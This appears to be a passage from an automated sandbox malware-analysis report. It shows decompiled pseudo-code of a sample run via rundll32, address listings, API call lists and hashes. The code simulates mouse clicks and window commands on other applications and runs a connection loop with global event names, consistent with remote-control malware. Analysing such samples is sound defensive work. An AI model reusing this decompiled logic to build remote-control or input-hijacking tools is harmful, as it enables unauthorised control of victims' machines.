                                                                                              									goto L41;
                                                                                              								case 7:
                                                                                              									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                                                              									goto L11;
                                                                                              								case 8:
                                                                                              									__edi = __edi - _v360;
                                                                                              									__esi = __ebx + __esi;
                                                                                              									__ecx = __ecx - __ebx;
                                                                                              									MoveWindow(_v340, __ecx, __edx, __esi, __edi, 0);
                                                                                              									goto L11;
                                                                                              								case 9:
                                                                                              									__edi = __edi - _v360;
                                                                                              									goto L41;
                                                                                              							}
                                                                                              						}
                                                                                              						 *(_t157 + 0x7c) = 0;
                                                                                              						_t172 = FindWindowA("Button", 0);
                                                                                              						GetWindowRect(_t172,  &_v336);
                                                                                              						_push(_v356.y);
                                                                                              						if(PtInRect( &_v336, _v356.x) == 0) {
                                                                                              							E0427DEA0(_t157,  &_v276, 0, 0x104);
                                                                                              							_t178 = _t178 + 0xc;
                                                                                              							RealGetWindowClassA(_t142,  &_v276, 0x104);
                                                                                              							_t123 = lstrcmpA( &_v276, "#32768");
                                                                                              							if(_t123 != 0) {
                                                                                              								_t124 = SendMessageW(_t142, 0x84, 0, _a12);
                                                                                              								 *(_t157 + 0x80) = _t124;
                                                                                              								if(_t124 == 2 || _t124 + 0xfffffff6 <= 7) {
                                                                                              									 *(_t157 + 0x7c) = _t142;
                                                                                              								}
                                                                                              								goto L2;
                                                                                              							}
                                                                                              							_t126 = SendMessageW(_t142, 0x1e1, _t123, _t123);
                                                                                              							_push(_v356.y);
                                                                                              							_t164 = _t126;
                                                                                              							_t173 = MenuItemFromPoint(0, _t164, _v356.x);
                                                                                              							GetMenuItemID(_t164, _t173);
                                                                                              							PostMessageW(_t142, 0x1e5, _t173, 0);
                                                                                              							PostMessageW(_t142, 0x100, 0xd, 0);
                                                                                              							goto L11;
                                                                                              						}
                                                                                              						PostMessageW(_t172, 0xf5, 0, 0);
                                                                                              						goto L10;
                                                                                              					}
                                                                                              					 *(_t157 + 0x7c) = 0;
                                                                                              					_t158 = _a12;
                                                                                              					_t132 = SendMessageW(_t142, 0x84, 0, _t158) + 1;
                                                                                              					if(_t132 > 0x15) {
                                                                                              						goto L3;
                                                                                              					}
                                                                                              					_t35 = _t132 + 0x42573fc; // 0x4040404
                                                                                              					switch( *((intOrPtr*)(( *_t35 & 0x000000ff) * 4 +  &M042573E8))) {
                                                                                              						case 0:
                                                                                              							SetWindowLongA(_t142, 0xfffffff0, GetWindowLongA(_t142, 0xfffffff0) | 0x08000000);
                                                                                              							SendMessageW(_t142, 0x84, 0, _t158);
                                                                                              							goto L3;
                                                                                              						case 1:
                                                                                              							PostMessageW(__ebx, 0x112, 0xf020, 0);
                                                                                              							goto L3;
                                                                                              						case 2:
                                                                                              							_v320.length = 0x2c;
                                                                                              							GetWindowPlacement(__ebx,  &_v320);
                                                                                              							_push(0);
                                                                                              							if((_v320.flags & 0x00000003) == 0) {
                                                                                              								PostMessageW(__ebx, 0x112, 0xf030, ??);
                                                                                              							} else {
                                                                                              								PostMessageW(__ebx, 0x112, 0xf120, ??);
                                                                                              							}
                                                                                              							goto L3;
                                                                                              						case 3:
                                                                                              							PostMessageW(__ebx, 0x10, 0, 0);
                                                                                              							goto L3;
                                                                                              						case 4:
                                                                                              							goto L3;
                                                                                              					}
                                                                                              				} else {
                                                                                              					_v356.x =  *(__ecx + 0x74);
                                                                                              					_t139 =  *(__ecx + 0x78);
                                                                                              					_push(_t139);
                                                                                              					_v356.y = _t139;
                                                                                              					_t142 = WindowFromPoint( *(__ecx + 0x74));
                                                                                              					L2:
                                                                                              					_t158 = _a12;
                                                                                              					L3:
                                                                                              					ScreenToClient(_t142,  &_v356);
                                                                                              					_push(_v356.y);
                                                                                              					_t167 = ChildWindowFromPoint(_t142, _v356.x);
                                                                                              					if(_t167 == 0) {
                                                                                              						L7:
                                                                                              						if(_v360 != 0) {
                                                                                              							_t158 = (_v356.y & 0x0000ffff) << 0x00000010 | _v356.x & 0x0000ffff;
                                                                                              						}
                                                                                              						PostMessageW(_t142, _a4, _a8, _t158);
                                                                                              						L10:
                                                                                              						L11:
                                                                                              						return E04275AFE(_v8 ^ _t178);
                                                                                              					}
                                                                                              					asm("o16 nop [eax+eax]");
                                                                                              					while(_t167 != _t142) {
                                                                                              						_t142 = _t167;
                                                                                              						ScreenToClient(_t167,  &_v356);
                                                                                              						_push(_v356.y);
                                                                                              						_t167 = ChildWindowFromPoint(_t167, _v356);
                                                                                              						if(_t167 != 0) {
                                                                                              							continue;
                                                                                              						}
                                                                                              						goto L7;
                                                                                              					}
                                                                                              					goto L7;
                                                                                              				}
                                                                                              			}






































                                                                                              0x04256fd6
                                                                                              0x04256fdc
                                                                                              0x04256fe3
                                                                                              0x04256ff5
                                                                                              0x04256ffd
                                                                                              0x04256fff
                                                                                              0x04257006
                                                                                              0x042570b4
                                                                                              0x042570ba
                                                                                              0x042570bd
                                                                                              0x042570c3
                                                                                              0x042570c4
                                                                                              0x042570c6
                                                                                              0x042570ce
                                                                                              0x042570d2
                                                                                              0x042570d6
                                                                                              0x042570da
                                                                                              0x042570dd
                                                                                              0x042570e6
                                                                                              0x042570e8
                                                                                              0x042570f0
                                                                                              0x042571c8
                                                                                              0x042572d1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042572d7
                                                                                              0x042572da
                                                                                              0x042572e0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042572f2
                                                                                              0x042572f8
                                                                                              0x042572fc
                                                                                              0x0425730e
                                                                                              0x04257312
                                                                                              0x0425731a
                                                                                              0x0425731e
                                                                                              0x04257321
                                                                                              0x04257326
                                                                                              0x042573d2
                                                                                              0x042573dc
                                                                                              0x00000000
                                                                                              0x042573dc
                                                                                              0x0425732c
                                                                                              0x00000000
                                                                                              0x04257343
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425738c
                                                                                              0x0425738f
                                                                                              0x04257391
                                                                                              0x0425739a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042573d0
                                                                                              0x042573d0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425734e
                                                                                              0x04257360
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04257384
                                                                                              0x04257388
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042573a5
                                                                                              0x042573a9
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04257379
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042573af
                                                                                              0x042573b3
                                                                                              0x042573ba
                                                                                              0x042573c1
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x042573cc
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425732c
                                                                                              0x042571d5
                                                                                              0x042571e2
                                                                                              0x042571ea
                                                                                              0x042571f0
                                                                                              0x04257205
                                                                                              0x04257222
                                                                                              0x04257227
                                                                                              0x04257235
                                                                                              0x04257245
                                                                                              0x0425724d
                                                                                              0x042572a7
                                                                                              0x042572ad
                                                                                              0x042572b6
                                                                                              0x042572c4
                                                                                              0x042572c4
                                                                                              0x00000000
                                                                                              0x042572b6
                                                                                              0x04257257
                                                                                              0x0425725d
                                                                                              0x04257261
                                                                                              0x04257270
                                                                                              0x04257274
                                                                                              0x04257289
                                                                                              0x04257295
                                                                                              0x00000000
                                                                                              0x04257295
                                                                                              0x04257095
                                                                                              0x00000000
                                                                                              0x04257095
                                                                                              0x042570fc
                                                                                              0x04257103
                                                                                              0x04257111
                                                                                              0x04257115
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425711b
                                                                                              0x04257122
                                                                                              0x00000000
                                                                                              0x0425713b
                                                                                              0x0425714a
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04257176
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04257181
                                                                                              0x0425718b
                                                                                              0x0425719b
                                                                                              0x0425719d
                                                                                              0x042571bc
                                                                                              0x0425719f
                                                                                              0x042571aa
                                                                                              0x042571aa
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425715d
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0425700c
                                                                                              0x0425700f
                                                                                              0x04257013
                                                                                              0x04257016
                                                                                              0x0425701a
                                                                                              0x04257024
                                                                                              0x04257026
                                                                                              0x04257026
                                                                                              0x04257029
                                                                                              0x0425702f
                                                                                              0x04257035
                                                                                              0x04257044
                                                                                              0x04257048
                                                                                              0x04257077
                                                                                              0x0425707c
                                                                                              0x0425708b
                                                                                              0x0425708b
                                                                                              0x04257095
                                                                                              0x04257095
                                                                                              0x0425709b
                                                                                              0x042570b1
                                                                                              0x042570b1
                                                                                              0x0425704a
                                                                                              0x04257050
                                                                                              0x04257058
                                                                                              0x0425705c
                                                                                              0x04257062
                                                                                              0x04257071
                                                                                              0x04257075
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x04257075
                                                                                              0x00000000
                                                                                              0x04257050

                                                                                              APIs
                                                                                              • WindowFromPoint.USER32(?,?), ref: 0425701E
                                                                                              • ScreenToClient.USER32(00000000,?), ref: 0425702F
                                                                                              • ChildWindowFromPoint.USER32(00000000,00000001,00000001), ref: 0425703E
                                                                                              • ScreenToClient.USER32(00000000,?), ref: 0425705C
                                                                                              • ChildWindowFromPoint.USER32(00000000,00000001,00000001), ref: 0425706B
                                                                                              • PostMessageW.USER32(00000000,?,?,?), ref: 04257095
                                                                                              • WindowFromPoint.USER32 ref: 042570E0
                                                                                              • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 0425710F
                                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 0425712C
                                                                                              • SetWindowLongA.USER32(00000000,000000F0,00000000), ref: 0425713B
                                                                                              • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 0425714A
                                                                                              • GetWindowPlacement.USER32(00000000,?), ref: 0425718B
                                                                                              • FindWindowA.USER32(Button,00000000), ref: 042571DC
                                                                                              • GetWindowRect.USER32(00000000,?), ref: 042571EA
                                                                                              • PtInRect.USER32(?,00000001,00000001), ref: 042571FD
                                                                                              • RealGetWindowClass.USER32(00000000,?,00000104), ref: 04257235
                                                                                              • lstrcmp.KERNEL32(?,#32768), ref: 04257245
                                                                                              • SendMessageW.USER32(00000000,000001E1,00000000,00000000), ref: 04257257
                                                                                              • MenuItemFromPoint.USER32(00000000,00000000,?,?), ref: 0425726A
                                                                                              • GetMenuItemID.USER32(00000000,00000000), ref: 04257274
                                                                                              • PostMessageW.USER32(00000000,000001E5,00000000,00000000), ref: 04257289
                                                                                              • PostMessageW.USER32(00000000,00000100,0000000D,00000000), ref: 04257295
                                                                                              • SendMessageW.USER32(00000000,00000084,00000000,?), ref: 042572A7
                                                                                              • GetWindowRect.USER32(?,?), ref: 042572FC
                                                                                              • MoveWindow.USER32(?,?,00000000,?,?,00000000), ref: 04257343
                                                                                              • MoveWindow.USER32(?,?,00000000,?,00000000,00000000,?,?,?,?,00000000,?,?,?,?,00000000), ref: 04257360
                                                                                              • MoveWindow.USER32(?,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000), ref: 04257379
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000,?,?,?,?,00000000), ref: 0425739A
                                                                                              • MoveWindow.USER32(?,?,?,?,00000000,00000000,?,00000000,?,00000000,00000000,?,00000000,?,00000000,00000000), ref: 042573C1
                                                                                              • MoveWindow.USER32(?,?,?,?,?,00000000), ref: 042573DC
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 0000000A.00000002.448598550.0000000004250000.00000040.00001000.00020000.00000000.sdmp, Offset: 04250000, based on PE: true
                                                                                              • Associated: 0000000A.00000002.448863141.0000000004294000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_10_2_4250000_rundll32.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Window$Message$Move$FromPoint$Send$PostRect$ChildClientItemLongMenuScreen$ClassFindPlacementReallstrcmp
                                                                                              • String ID: #32768$,$Button
                                                                                              • API String ID: 4148729706-3823977346
                                                                                              • Opcode ID: 2202c4dc05d77adfbd6d6c488c6090f6e7e3a6a8d013142fa3b530ebde32a4e5
                                                                                              • Instruction ID: d1b79e3e1694b4b23bb5d9bf650d90b311e22440cfeb3fe3f393b6104d0e2ee0
                                                                                              • Opcode Fuzzy Hash: 2202c4dc05d77adfbd6d6c488c6090f6e7e3a6a8d013142fa3b530ebde32a4e5
                                                                                              • Instruction Fuzzy Hash: D4B18B72358301BFD7209F68EC49F6B7BE8EB88714F005A18F955A6190DB74EC05DBA2
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              C-Code - Quality: 81%
                                                                                              			E0426B5F0(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                                                                                              				signed int _v8;
                                                                                              				short _v204;
                                                                                              				char _v208;
                                                                                              				char _v308;
                                                                                              				char _v309;
                                                                                              				intOrPtr _v315;
                                                                                              				char _v316;
                                                                                              				signed int _v320;
                                                                                              				char _v340;
                                                                                              				char _v380;
                                                                                              				char _v512;
                                                                                              				void _v516;
                                                                                              				signed short* _v520;
                                                                                              				void* _v525;
                                                                                              				void* _v532;
                                                                                              				int _v536;
                                                                                              				void* _v537;
                                                                                              				signed int _v540;
                                                                                              				intOrPtr _v544;
                                                                                              				int _v545;
                                                                                              				signed short* _v548;
                                                                                              				void* _v549;
                                                                                              				void* _v552;
                                                                                              				signed int _t118;
                                                                                              				void* _t120;
                                                                                              				void* _t122;
                                                                                              				long _t127;
                                                                                              				void* _t134;
                                                                                              				signed int _t140;
                                                                                              				signed int _t143;
                                                                                              				long _t155;
                                                                                              				void* _t157;
                                                                                              				void* _t163;
                                                                                              				void* _t171;
                                                                                              				void* _t172;
                                                                                              				void* _t178;
                                                                                              				void* _t179;
                                                                                              				void* _t184;
                                                                                              				intOrPtr _t186;
                                                                                              				void* _t188;
                                                                                              				int _t192;
                                                                                              				void* _t194;
                                                                                              				void* _t196;
                                                                                              				void* _t197;
                                                                                              				void* _t199;
                                                                                              				void* _t209;
                                                                                              				char* _t217;
                                                                                              				void* _t219;
                                                                                              				void* _t227;
                                                                                              				void* _t229;
                                                                                              				void* _t230;
                                                                                              				void* _t231;
                                                                                              				void* _t232;
                                                                                              				void* _t234;
                                                                                              				signed int _t240;
                                                                                              				void* _t247;
                                                                                              				void* _t253;
                                                                                              				intOrPtr _t256;
                                                                                              				void* _t257;
                                                                                              				long _t261;
                                                                                              				void* _t263;
                                                                                              				void* _t265;
                                                                                              				signed int _t268;
                                                                                              				signed int _t270;
                                                                                              				void* _t271;
                                                                                              				void* _t273;
                                                                                              				void* _t274;
                                                                                              
                                                                                              				_t274 = __eflags;
                                                                                              				_t242 = __edi;
                                                                                              				_t270 = (_t268 & 0xfffffff8) - 0x22c;
                                                                                              				_t118 =  *0x42a4008; // 0xd33db39d
                                                                                              				_v8 = _t118 ^ _t270;
                                                                                              				_push(__ebx);
                                                                                              				_push(__esi);
                                                                                              				_push(__edi);
                                                                                              				_t120 = E0426ABF0();
                                                                                              				_v532 = 0;
                                                                                              				_t253 = _t120;
                                                                                              				_v536 = 0;
                                                                                              				E04269390(__ebx,  &_v540, __edi, _t253, _t274, L"Control");
                                                                                              				if(_v540 != 0 || _t253 != 0 && _v540 != 0) {
                                                                                              					_t122 = _v532;
                                                                                              					__eflags = _t122;
                                                                                              					if(_t122 != 0) {
                                                                                              						CloseHandle(_t122);
                                                                                              					}
                                                                                              					goto L73;
                                                                                              				} else {
                                                                                              					SetErrorMode(1);
                                                                                              					_t127 = GetTickCount();
                                                                                              					wsprintfA( &_v316, "Global\\%d%d", GetTickCount(), _t127);
                                                                                              					_t271 = _t270 + 0x10;
                                                                                              					_t278 = _t253;
                                                                                              					if(_t253 != 0) {
                                                                                              						CloseHandle(CreateThread(0, 0, E0426C0A0, 0, 0, 0));
                                                                                              						if(E0425E880(CloseHandle, _t242, CreateThread, _t278) > 0) {
                                                                                              							CloseHandle(CreateThread(0, 0, E0425E6E0, 0, 0, 0));
                                                                                              						}
                                                                                              					}
                                                                                              					E0425A330();
                                                                                              					_t209 = 0;
                                                                                              					_v552 = 0;
                                                                                              					while(1) {
                                                                                              						L7:
                                                                                              						_t134 = memcpy( &_v516, 0x42a6318, 0x31 << 2);
                                                                                              						_t271 = _t271 + 0xc;
                                                                                              						asm("movsw");
                                                                                              						_t281 = _t134;
                                                                                              						if(_t134 == 0) {
                                                                                              							_t199 = E04275B14(0x42a6318, _t281, 0x3c);
                                                                                              							_t271 = _t271 + 4;
                                                                                              							_t134 = E042562B0(_t209, _t199, 0x42a637a);
                                                                                              							 *0x42a78d0 = _t134;
                                                                                              						}
                                                                                              						if( *((intOrPtr*)(_t134 + 0x38)) != 0) {
                                                                                              							memcpy( &_v516, 0x42a63de, 0x31 << 2);
                                                                                              							_t271 = _t271 + 0xc;
                                                                                              							asm("movsw");
                                                                                              						}
                                                                                              						_t256 = 0;
                                                                                              						_v544 = 0;
                                                                                              						if((_v320 & 0x0000ffff) + 1 == 0) {
                                                                                              							break;
                                                                                              						}
                                                                                              						_t247 = _v552;
                                                                                              						do {
                                                                                              							if(_t247 != 0) {
                                                                                              								E04258C90(_t247);
                                                                                              								_t147 =  *(_t247 + 0x50);
                                                                                              								if( *(_t247 + 0x50) != 0) {
                                                                                              									E04275B0F(_t147);
                                                                                              									_t271 = _t271 + 4;
                                                                                              								}
                                                                                              								 *(_t247 + 0x58) = 0;
                                                                                              								 *(_t247 + 0x50) = 0;
                                                                                              								 *(_t247 + 0x54) = 0;
                                                                                              								 *((intOrPtr*)(_t247 + 0x30)) = 0x429df88;
                                                                                              								 *((intOrPtr*)(_t247 + 0x28)) = 0x429e008;
                                                                                              								_t148 =  *((intOrPtr*)(_t247 + 0x1c));
                                                                                              								if( *((intOrPtr*)(_t247 + 0x1c)) != 0) {
                                                                                              									E04275B0F(_t148);
                                                                                              									_t271 = _t271 + 4;
                                                                                              								}
                                                                                              								_push(0x60);
                                                                                              								E04275B47(_t247);
                                                                                              								_t271 = _t271 + 8;
                                                                                              								_t247 = 0;
                                                                                              								_v552 = 0;
                                                                                              							}
                                                                                              							if(_t209 != 0) {
                                                                                              								 *( *_t209)(1);
                                                                                              								_t209 = 0;
                                                                                              							}
                                                                                              							if(_t256 != 0) {
                                                                                              								E0426B400(_t209,  &_v204, _t247, _t256,  &_v380,  &_v340);
                                                                                              								_t271 = _t271 + 8;
                                                                                              								goto L26;
                                                                                              							} else {
                                                                                              								_t219 = 0;
                                                                                              								asm("o16 nop [eax+eax]");
                                                                                              								do {
                                                                                              									_t143 =  *(_t271 + _t219 + 0x38) & 0x0000ffff;
                                                                                              									_t219 = _t219 + 2;
                                                                                              									 *(_t271 + _t219 + 0x166) = _t143;
                                                                                              								} while (_t143 != 0);
                                                                                              								L26:
                                                                                              								_t140 = 0;
                                                                                              								_v540 = 0;
                                                                                              								do {
                                                                                              									_t257 =  &_v516;
                                                                                              									_t258 = _t257 + _t140 * 2;
                                                                                              									_v520 = _t257 + _t140 * 2;
                                                                                              									if( *(_t257 + _t140 * 2) == 0) {
                                                                                              										goto L38;
                                                                                              									}
                                                                                              									_t217 =  &_v512;
                                                                                              									_t294 =  *((short*)(_t217 + _t140 * 2));
                                                                                              									_v548 = _t217 + _t140 * 2;
                                                                                              									if( *((short*)(_t217 + _t140 * 2)) == 0) {
                                                                                              										goto L38;
                                                                                              									}
                                                                                              									_t247 = E04275B14(_t258, _t294, 0x60);
                                                                                              									_v552 = _t247;
                                                                                              									E04257980(_t247);
                                                                                              									 *((intOrPtr*)(_t247 + 0x28)) = 0x429e048;
                                                                                              									 *(_t247 + 0x2c) = 0;
                                                                                              									 *((intOrPtr*)(_t247 + 0x30)) = 0x429e024;
                                                                                              									 *(_t247 + 0x34) = 0;
                                                                                              									 *(_t247 + 0x58) = 0;
                                                                                              									 *(_t247 + 0x50) = 0;
                                                                                              									 *(_t247 + 0x54) = 0;
                                                                                              									 *(_t247 + 0x40) = 0;
                                                                                              									 *(_t247 + 0x20) = 0;
                                                                                              									 *(_t247 + 0x24) = 0;
                                                                                              									 *(_t247 + 0x38) = 0;
                                                                                              									 *((char*)(_t247 + 0x3c)) = 0x43;
                                                                                              									E04258AE0(_t247,  *_t258 & 0x0000ffff);
                                                                                              									_t155 = GetTickCount();
                                                                                              									_t271 = _t271 + 4 - 0xc;
                                                                                              									_t261 = _t155;
                                                                                              									_push( *_v552 & 0x0000ffff);
                                                                                              									_push( &_v208);
                                                                                              									_t157 = E04258BB0(_t247);
                                                                                              									_t295 = _t157;
                                                                                              									if(_t157 == 0) {
                                                                                              										L37:
                                                                                              										_t140 = _v540;
                                                                                              										goto L38;
                                                                                              									}
                                                                                              									_v536 = GetTickCount() - _t261;
                                                                                              									_t209 = E04275B14(_t261, _t295, 0x11c);
                                                                                              									_t273 = _t271 + 4;
                                                                                              									_t262 =  *_v520 & 0x0000ffff;
                                                                                              									_t163 = _v552;
                                                                                              									 *_t209 = 0x429e8b0;
                                                                                              									 *((intOrPtr*)(_t209 + 4)) = _t163;
                                                                                              									 *(_t163 + 0x38) = _t209;
                                                                                              									 *((intOrPtr*)(_t209 + 8)) = CreateEventW(0, 1, 0, 0);
                                                                                              									_t69 = _t209 + 0xc; // 0xc
                                                                                              									 *_t209 = 0x429e1a0;
                                                                                              									 *0x42a78d4 =  *_v520 & 0x0000ffff;
                                                                                              									lstrcpyA(_t69,  &_v308);
                                                                                              									lstrcpyW(0x42a78d8,  &_v204);
                                                                                              									_t170 =  *0x42a78d0; // 0x0
                                                                                              									 *0x42a4760 =  *_v548 & 0x0000ffff;
                                                                                              									_t247 = _v552;
                                                                                              									 *(_t209 + 0x118) = 0;
                                                                                              									 *(_t209 + 0x114) = 0;
                                                                                              									 *((char*)(_t209 + 0x110)) = 0;
                                                                                              									 *(_t247 + 0x38) = _t209;
                                                                                              									_t296 = _t170;
                                                                                              									if(_t170 == 0) {
                                                                                              										_t197 = E04275B14(_t262, _t296, 0x3c);
                                                                                              										_t273 = _t273 + 4;
                                                                                              										 *0x42a78d0 = E042562B0(_t209, _t197, _t247);
                                                                                              									}
                                                                                              									_t227 = _t247;
                                                                                              									_t171 = E0426B0C0(_t209, _t227, _v536, _t247, _t262, 0x42a64a4, L"20220829", L"v20220829",  *((intOrPtr*)(_t170 + 0x30)));
                                                                                              									_t271 = _t273 + 0x10;
                                                                                              									if(_t171 == 0) {
                                                                                              										goto L37;
                                                                                              									} else {
                                                                                              										_t263 = 0;
                                                                                              										while( *((char*)(_t209 + 0x110)) == 0) {
                                                                                              											Sleep(0x3e8);
                                                                                              											_t263 = _t263 + 1;
                                                                                              											if(_t263 < 0x3c) {
                                                                                              												continue;
                                                                                              											}
                                                                                              											if( *((char*)(_t209 + 0x110)) != 0) {
                                                                                              												break;
                                                                                              											}
                                                                                              											goto L37;
                                                                                              										}
                                                                                              										__eflags = _t247;
                                                                                              										if(__eflags == 0) {
                                                                                              											goto L40;
                                                                                              										}
                                                                                              										__eflags = _t209;
                                                                                              										if(__eflags == 0) {
                                                                                              											goto L40;
                                                                                              										}
                                                                                              										_t172 =  *0x42a78d0; // 0x0
                                                                                              										_v316 = 0xa0;
                                                                                              										__eflags = _t172;
                                                                                              										if(__eflags == 0) {
                                                                                              											_t196 = E04275B14(_t263, __eflags, 0x3c);
                                                                                              											_t271 = _t271 + 4;
                                                                                              											_t227 = _t196;
                                                                                              											_t172 = E042562B0(_t209, _t227, _t247);
                                                                                              											 *0x42a78d0 = _t172;
                                                                                              										}
                                                                                              										_push(_t227);
                                                                                              										_push(0x3f);
                                                                                              										_v315 =  *((intOrPtr*)( *((intOrPtr*)(_t172 + 0x28)) + 0x14));
                                                                                              										_push(5);
                                                                                              										_push( &_v316);
                                                                                              										E04251C60( *((intOrPtr*)(_t209 + 4)));
                                                                                              										do {
                                                                                              											_t178 = OpenEventA(0x1f0003, 0,  &_v309);
                                                                                              											_t240 =  *(_t247 + 0x5c) & 0x0000ffff;
                                                                                              											_v549 = _t178;
                                                                                              											__eflags = _t240 - 1;
                                                                                              											if(_t240 != 1) {
                                                                                              												L49:
                                                                                              												__eflags = _t240 - 2;
                                                                                              												if(_t240 != 2) {
                                                                                              													L56:
                                                                                              													_t179 =  *(_t209 + 0x118);
                                                                                              													_v537 = _t179;
                                                                                              													_v545 = 0;
                                                                                              													__eflags = _t179;
                                                                                              													if(_t179 == 0) {
                                                                                              														L61:
                                                                                              														_t229 =  *0x42a78cc; // 0x0
                                                                                              														__eflags = _t229;
                                                                                              														if(_t229 != 0) {
                                                                                              															_t186 =  *((intOrPtr*)(_t229 + 4));
                                                                                              															__eflags =  *(_t186 + 4);
                                                                                              															if( *(_t186 + 4) != 0) {
                                                                                              																 *((char*)(_t229 + 1)) = 0;
                                                                                              																E0425A290(_t229, _t229);
                                                                                              																 *0x42a78cc = 0;
                                                                                              															}
                                                                                              														}
                                                                                              														_t265 = _v549;
                                                                                              														__eflags = _t265;
                                                                                              														if(__eflags == 0) {
                                                                                              															goto L7;
                                                                                              														} else {
                                                                                              															_t230 =  *(_t247 + 0x20);
                                                                                              															 *(_t247 + 0x44) = 1;
                                                                                              															__eflags = _t230;
                                                                                              															if(_t230 != 0) {
                                                                                              																L68:
                                                                                              																 *((intOrPtr*)( *_t230 + 4))();
                                                                                              																L69:
                                                                                              																CloseHandle(_t265);
                                                                                              																SetErrorMode(0);
                                                                                              																_t184 = _v525;
                                                                                              																__eflags = _t184;
                                                                                              																if(_t184 != 0) {
                                                                                              																	CloseHandle(_t184);
                                                                                              																}
                                                                                              																L73:
                                                                                              																__eflags = _v8 ^ _t270;
                                                                                              																return E04275AFE(_v8 ^ _t270);
                                                                                              															}
                                                                                              															_t231 =  *(_t247 + 0x24);
                                                                                              															__eflags = _t231;
                                                                                              															if(_t231 == 0) {
                                                                                              																goto L69;
                                                                                              															}
                                                                                              															_t230 = _t231 + 4;
                                                                                              															__eflags = _t230;
                                                                                              															goto L68;
                                                                                              														}
                                                                                              													} else {
                                                                                              														goto L57;
                                                                                              													}
                                                                                              													while(1) {
                                                                                              														L57:
                                                                                              														Sleep(0x3e8);
                                                                                              														_t188 = OpenEventA(0x1f0003, 1, "Global\\CONN0000000000");
                                                                                              														__eflags = _t188;
                                                                                              														if(_t188 != 0) {
                                                                                              															break;
                                                                                              														}
                                                                                              														_t192 = _v545 + 1;
                                                                                              														_v545 = _t192;
                                                                                              														__eflags = _t192 - _v537;
                                                                                              														if(_t192 < _v537) {
                                                                                              															continue;
                                                                                              														}
                                                                                              														goto L61;
                                                                                              													}
                                                                                              													CloseHandle(_t188);
                                                                                              													lstrcpyW(0x42a64a4, L"[CONN]");
                                                                                              													goto L61;
                                                                                              												}
                                                                                              												_t232 =  *(_t247 + 0x24);
                                                                                              												__eflags = _t232;
                                                                                              												if(_t232 == 0) {
                                                                                              													goto L56;
                                                                                              												}
                                                                                              												_t194 =  *((intOrPtr*)( *((intOrPtr*)(_t232 + 4)) + 0x40))();
                                                                                              												__eflags = _t194;
                                                                                              												if(_t194 == 0) {
                                                                                              													goto L56;
                                                                                              												}
                                                                                              												__eflags =  *(_t247 + 0x48);
                                                                                              												L53:
                                                                                              												if(__eflags == 0) {
                                                                                              													goto L56;
                                                                                              												}
                                                                                              												goto L54;
                                                                                              											}
                                                                                              											_t234 =  *(_t247 + 0x20);
                                                                                              											__eflags = _t234;
                                                                                              											if(_t234 == 0) {
                                                                                              												goto L49;
                                                                                              											}
                                                                                              											__eflags =  *((intOrPtr*)( *_t234 + 0x40))();
                                                                                              											goto L53;
                                                                                              											L54:
                                                                                              											Sleep(0x1f4);
                                                                                              											__eflags = _v549;
                                                                                              										} while (_v549 == 0);
                                                                                              										goto L61;
                                                                                              									}
                                                                                              									L38:
                                                                                              									_t140 = _t140 + 1;
                                                                                              									_v540 = _t140;
                                                                                              								} while (_t140 < 2);
                                                                                              							}
                                                                                              							_t256 = _v544 + 1;
                                                                                              							_v544 = _t256;
                                                                                              						} while (_t256 < (_v320 & 0x0000ffff) + 1);
                                                                                              						break;
                                                                                              					}
                                                                                              					L40:
                                                                                              					Sleep(0x2710);
                                                                                              					goto L7;
                                                                                              				}
                                                                                              			}






































































                                                                                              0x0426b5f0
                                                                                              0x0426b5f0
                                                                                              0x0426b5f6
                                                                                              0x0426b5fc
                                                                                              0x0426b603
                                                                                              0x0426b60a
                                                                                              0x0426b60b
                                                                                              0x0426b60c
                                                                                              0x0426b60d
                                                                                              0x0426b61b
                                                                                              0x0426b623
                                                                                              0x0426b625
                                                                                              0x0426b62d
                                                                                              0x0426b637
                                                                                              0x0426bb8a
                                                                                              0x0426bb8e
                                                                                              0x0426bb90
                                                                                              0x0426bb93
                                                                                              0x0426bb93
                                                                                              0x00000000
                                                                                              0x0426b64c
                                                                                              0x0426b64e
                                                                                              0x0426b65a
                                                                                              0x0426b66d
                                                                                              0x0426b679
                                                                                              0x0426b67c
                                                                                              0x0426b67e
                                                                                              0x0426b698
                                                                                              0x0426b6a1
                                                                                              0x0426b6b5
                                                                                              0x0426b6b5
                                                                                              0x0426b6a1
                                                                                              0x0426b6b7
                                                                                              0x0426b6be
                                                                                              0x0426b6c0
                                                                                              0x0426b6d0
                                                                                              0x0426b6d0
                                                                                              0x0426b6e3
                                                                                              0x0426b6e3
                                                                                              0x0426b6e5
                                                                                              0x0426b6e7
                                                                                              0x0426b6e9
                                                                                              0x0426b6ed
                                                                                              0x0426b6f2
                                                                                              0x0426b6f7
